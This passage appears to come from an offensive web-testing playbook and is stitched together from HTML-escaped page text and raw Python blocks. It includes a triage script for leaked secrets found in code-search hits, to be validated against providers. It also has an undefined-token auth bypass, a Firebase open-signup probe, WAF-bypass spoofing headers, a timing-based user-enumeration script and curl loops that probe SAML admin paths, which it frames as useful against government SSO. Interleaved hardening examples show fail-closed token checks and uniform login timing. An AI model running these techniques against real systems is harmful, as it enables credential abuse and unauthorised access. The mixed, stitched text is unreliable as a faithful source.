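PLACEHOLDER_WORDS = re.compile(r"(?i)(example|your[_-]|changeme|placeholder|redacted|dummy|sample|xxxx|\btest\b)")
MIN_DISTINCT_CHARS = 6  # "SG.xxxx..." and "QQQQ...=" repeat a handful of symbols


@dataclass
class Finding:
    kind: str
    secret: str
    line_no: int
    verdict: str  # "candidate" or "placeholder"


def looks_like_placeholder(secret, context):
    """Template vocabulary in the surrounding line, or a value with fewer than
    MIN_DISTINCT_CHARS distinct characters, marks a placeholder."""
    if PLACEHOLDER_WORDS.search(context):
        return True
    return len(set(secret)) in range(MIN_DISTINCT_CHARS)


def triage(lines):
    """One Finding per pattern hit, in line order."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                secret = match.group(1)
                verdict = "placeholder" if looks_like_placeholder(secret, line) else "candidate"
                findings.append(Finding(kind, secret, line_no, verdict))
    return findings


def candidates(lines):
    """Only the hits worth validating against the provider."""
    return [f for f in triage(lines) if f.verdict == "candidate"]


SA_REQUIRED = ("type", "project_id", "private_key_id", "private_key", "client_email", "token_uri")
PEM_HEADER, PEM_FOOTER = "-----BEGIN PRIVATE KEY-----", "-----END PRIVATE KEY-----"


def classify_service_account(text):
    """Structural check of a GCP/Firebase service-account JSON. Returns (ok, detail).
    It does not parse the key; the JWT exchange is what proves a key is live."""
    try:
        sa = json.loads(text)
    except ValueError:
        return False, "not json"
    missing = [k for k in SA_REQUIRED if k not in sa]
    if missing:
        return False, "missing " + ",".join(missing)
    if sa["type"] != "service_account":
        return False, "type is " + str(sa["type"])
    if not sa["client_email"].endswith(".iam.gserviceaccount.com"):
        return False, "client_email is not a service account"
    pem = sa["private_key"]
    body = pem.replace(PEM_HEADER, "").replace(PEM_FOOTER, "").strip()
    if not pem.startswith(PEM_HEADER) or "..." in body or len(set(body)) in range(MIN_DISTINCT_CHARS):
        return False, "private_key is not a usable PEM block"
    return True, sa["project_id"]


# Constructed samples of typical .env hits; none of these are real credentials.
SAMPLE_LINES = [
    "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",             # AWS documentation key
    "AWS_ACCESS_KEY_ID=AKIAJ4XQ7PLMN2ABCD5Q",             # made up, real-looking
    "SENDGRID_API_KEY=SG." + "x" * 22 + "." + "x" * 43,   # template
    "MONGO_URL=mongodb+srv://app:S3cr3tPass@cluster0.abcde.mongodb.net/prod",
    "DB_PASSWORD=your_password_here",
    "APP_KEY=base64:" + "Q" * 43 + "=",
]
SAMPLE_SA_JSON = json.dumps({
    "type": "service_account", "project_id": "demo-project-1234",
    "private_key_id": "0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c",
    "private_key": PEM_HEADER + "\nMIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDk7vQm\n" + PEM_FOOTER + "\n",
    "client_email": "firebase-adminsdk-ab1cd@demo-project-1234.iam.gserviceaccount.com",
    "token_uri": "https://oauth2.googleapis.com/token",
})
# Same file as a checked-in template: the key body replaced by an ellipsis.
SAMPLE_SA_TEMPLATE = json.dumps(dict(json.loads(SAMPLE_SA_JSON),
                                     private_key=PEM_HEADER + "\n...\n" + PEM_FOOTER + "\n"))

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"{f.verdict:11s} line {f.line_no} {f.kind:18s} {f.secret[:40]}")
    print(classify_service_account(SAMPLE_SA_JSON), classify_service_account(SAMPLE_SA_TEMPLATE))
```

&lt;p&gt;Feed it the matching lines from each search hit (or a fetched file body split into lines) and validate only what &lt;code&gt;candidates()&lt;/code&gt; returns. On the constructed sample, two of the six hits survive: the made-up AWS key and the MongoDB URI; the documentation key, the SendGrid template, the &lt;code&gt;your_password_here&lt;/code&gt; value and the all-Q Laravel key are dropped without touching any provider.&lt;/p&gt;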
&lt;h3 id="144-docker-hub-npm-search-engines" &gt;
&lt;div&gt;
&lt;a href="#144-docker-hub-npm-search-engines"&gt;
##
&lt;/a&gt;
14.4 Docker Hub, NPM, Search Engines
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Effectiveness&lt;/th&gt;
&lt;th&gt;Note&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GitHub (with token)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Best free leak source&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GitLab (self-hosted)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;If the target has a public GitLab&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Docker Hub&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐&lt;/td&gt;
&lt;td&gt;Low volume, rarely useful&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NPM Registry&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐&lt;/td&gt;
&lt;td&gt;Only legitimate packages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Bing/Yandex&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐&lt;/td&gt;
&lt;td&gt;Blocks scraping&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;DuckDuckGo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐&lt;/td&gt;
&lt;td&gt;Blocks heavy scraping&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;hr&gt;
&lt;h2 id="15-authentication--bypass" &gt;
&lt;div&gt;
&lt;a href="#15-authentication--bypass"&gt;
#
&lt;/a&gt;
15. AUTHENTICATION &amp;amp; BYPASS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="151-token-bypass-undefined--undefined" &gt;
&lt;div&gt;
&lt;a href="#151-token-bypass-undefined--undefined"&gt;
##
&lt;/a&gt;
15.1 Token Bypass (undefined === undefined)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If the server-side validation compares two values that may both be &lt;code&gt;undefined&lt;/code&gt;, a missing secret and a missing header compare equal:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// VULNERABLE CODE
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; (req.headers[&lt;span style="color:#a6d189"&gt;&amp;#34;x-migration-token&amp;#34;&lt;/span&gt;] &lt;span style="color:#99d1db;font-weight:bold"&gt;===&lt;/span&gt; process.env.MIGRATION_TOKEN) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;// access granted
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// If MIGRATION_TOKEN is not defined in .env:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// process.env.MIGRATION_TOKEN = undefined
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// req.headers[&amp;#34;x-migration-token&amp;#34;] = undefined (header not sent)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// undefined === undefined → TRUE → bypass!
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;ALWAYS test endpoints without sending the authentication header. Often the logic is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Header present + wrong value → 401&lt;/li&gt;
&lt;li&gt;Header absent → 200 (bypass due to &lt;code&gt;undefined === undefined&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
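The same defect and its fix, as an added example in Python rather than code from the playbook: a plain-dict stand-in for a framework's request headers and environment (hypothetical, no web framework involved), where an unset secret and an absent header compare as None == None exactly as undefined === undefined does above, beside a check that fails closed and compares in constant time.

```python
import hmac


def get_header(headers, name):
    """Case-insensitive header lookup over a plain dict (stand-in for a
    framework's request.headers; returns None when the header is absent)."""
    lowered = {k.lower(): v for k, v in headers.items()}
    return lowered.get(name.lower())


def check_token_vulnerable(headers, env):
    """Mirrors the JavaScript above: when MIGRATION_TOKEN is unset and the
    header is not sent, both sides are None and None == None is True."""
    return get_header(headers, "x-migration-token") == env.get("MIGRATION_TOKEN")


def check_token_hardened(headers, env):
    """Fail closed on misconfiguration, reject a missing header explicitly,
    and compare in constant time so the check is not a timing oracle."""
    expected = env.get("MIGRATION_TOKEN")
    if not expected:
        # An unconfigured secret must disable the endpoint, not open it.
        return False
    supplied = get_header(headers, "x-migration-token")
    if supplied is None:
        return False
    return hmac.compare_digest(supplied.encode(), expected.encode())


def status_for(check, headers, env):
    """HTTP status a handler built on the given check would return."""
    return 200 if check(headers, env) else 401


if __name__ == "__main__":
    # Constructed scenarios: secret missing from the environment, then set.
    scenarios = (("MIGRATION_TOKEN unset", {}), ("MIGRATION_TOKEN set", {"MIGRATION_TOKEN": "s3cret"}))
    for label, env in scenarios:
        for name, check in (("vulnerable", check_token_vulnerable), ("hardened", check_token_hardened)):
            print(label, name, "no header:", status_for(check, {}, env),
                  "wrong header:", status_for(check, {"X-Migration-Token": "bad"}, env))
```

The hardened variant treats an empty or unset secret as a deployment error and returns 401 for every request, which is what the "header absent → 200" test described above should surface in a log review rather than a bypass.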
&lt;h3 id="152-firebase-password-auth--test-signup" &gt;
&lt;div&gt;
&lt;a href="#152-firebase-password-auth--test-signup"&gt;
##
&lt;/a&gt;
15.2 Firebase Password Auth — Test SignUp
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test whether signUp is enabled&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;WEB_API_KEY&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; json&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;test@test.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;password&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;Test123!&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;returnSecureToken&amp;#34;&lt;/span&gt;: &lt;span style="color:#ef9f76"&gt;True&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 200 → Registration OPEN (create account without invite)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 400 &amp;#34;WEAK_PASSWORD&amp;#34; → registration open, weak password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 400 &amp;#34;OPERATION_NOT_ALLOWED&amp;#34; → disabled&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="153-api-gateway--waf-bypass" &gt;
&lt;div&gt;
&lt;a href="#153-api-gateway--waf-bypass"&gt;
##
&lt;/a&gt;
15.3 API Gateway / WAF Bypass
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Headers that bypass protections:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bypass_headers &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Forwarded-For&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Real-IP&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Originating-IP&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Remote-IP&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Client-IP&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Host&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Forwarded-Host&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Original-URL&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;/admin&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Rewrite-URL&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;/admin&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-HTTP-Method-Override&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;GET&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test direct IP access (CDN/WAF bypass)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Many domains behind Cloudflare have the real IP accessible&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# via DNS history (SecurityTrails, DNSDB)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="154-timing-based-user-enumeration" &gt;
&lt;div&gt;
&lt;a href="#154-timing-based-user-enumeration"&gt;
##
&lt;/a&gt;
15.4 Timing-Based User Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Response time difference reveals if user exists&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;timing_test&lt;/span&gt;(url, username, password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;wrongpass&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; start &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(url, json&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;: username, &lt;span style="color:#a6d189"&gt;&amp;#34;password&amp;#34;&lt;/span&gt;: password})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; elapsed &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; (time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time() &lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt; start) &lt;span style="color:#99d1db;font-weight:bold"&gt;*&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;1000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; elapsed
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If admin@target.com → 896ms, fake@target.com → 572ms&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Difference &amp;gt; 200ms confirms user enumeration&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Corporate intranet — 200-300 ms timing oracle between valid and invalid users, allowing complete enumeration of all system users.&lt;/p&gt;
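The mitigation for that oracle, as an added example that is not from the playbook: a login routine that always performs one password-hash computation, hashing a dummy credential when the account does not exist, shown beside the leaky early-return shape. The user store, salts and passwords are constructed; PBKDF2 from hashlib stands in for whatever the real backend uses.

```python
import hashlib
import hmac
import os
import time

ITERATIONS = 50_000  # lowered for the demo; production values are higher


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store (email: (salt, hash)); sample data only.
_SALT = os.urandom(16)
USERS = {"admin@target.example": (_SALT, hash_password("correct horse", _SALT))}

# Dummy record so an unknown account costs the same hashing work as a real one.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("dummy-not-a-real-password", _DUMMY_SALT)


def login_leaky(email, password):
    """Returns early for unknown accounts and skips PBKDF2: the faster
    response is the oracle. Returns (authenticated, hashes_computed)."""
    record = USERS.get(email)
    if record is None:
        return False, 0
    salt, stored = record
    return hmac.compare_digest(hash_password(password, salt), stored), 1


def login_uniform(email, password):
    """Always performs one PBKDF2 run and one constant-time compare, so the
    known and unknown branches do the same work. Returns (authenticated, hashes_computed)."""
    record = USERS.get(email)
    exists = record is not None
    salt, stored = record if exists else (_DUMMY_SALT, _DUMMY_HASH)
    match = hmac.compare_digest(hash_password(password, salt), stored)
    # A match against the dummy record must never authenticate.
    return (match and exists), 1


def time_ms(fn, *args):
    """Wall-clock cost of one call, in milliseconds."""
    start = time.perf_counter()
    fn(*args)
    return (time.perf_counter() - start) * 1000


if __name__ == "__main__":
    for name, fn in (("leaky", login_leaky), ("uniform", login_uniform)):
        known = time_ms(fn, "admin@target.example", "wrongpass")
        unknown = time_ms(fn, "nobody@target.example", "wrongpass")
        print(f"{name}: known {known:.0f} ms, unknown {unknown:.0f} ms, delta {known - unknown:.0f} ms")
```

Running the main block shows the leaky variant answering unknown accounts in well under a millisecond while the uniform variant takes the same tens of milliseconds on both paths; the remaining jitter is the database lookup, which should also be made uniform (a query that runs whether or not the row exists) before the delta can be called closed.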
&lt;h3 id="155-saml--simplesamlphp--reconnaissance-and-exploitation" &gt;
&lt;div&gt;
&lt;a href="#155-saml--simplesamlphp--reconnaissance-and-exploitation"&gt;
##
&lt;/a&gt;
15.5 SAML / SimpleSAMLphp — Reconnaissance and Exploitation
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;SAML (Security Assertion Markup Language) is used in corporate/government SSOs. SimpleSAMLphp is the most common implementation in government.&lt;/p&gt;
&lt;h4 id="idp-discovery" &gt;
&lt;div&gt;
&lt;a href="#idp-discovery"&gt;
###
&lt;/a&gt;
IdP Discovery
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Common SAML IdP URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; path in /saml2/idp/metadata.php /simplesaml/saml2/idp/metadata.php &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /module.php/saml/idp/metadata.php /Shibboleth.sso/Metadata &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /simplesaml/module.php/saml/sp/metadata.php; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;code&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt; → &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$code&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SimpleSAMLphp admin (if exposed)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; path in /simplesaml/admin/ /simplesaml/module.php/admin/ &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /module.php/admin/; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;code&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt; → &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$code&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If SimpleSAMLphp is not at /simplesaml/ (common behind nginx),&lt;/span&gt;
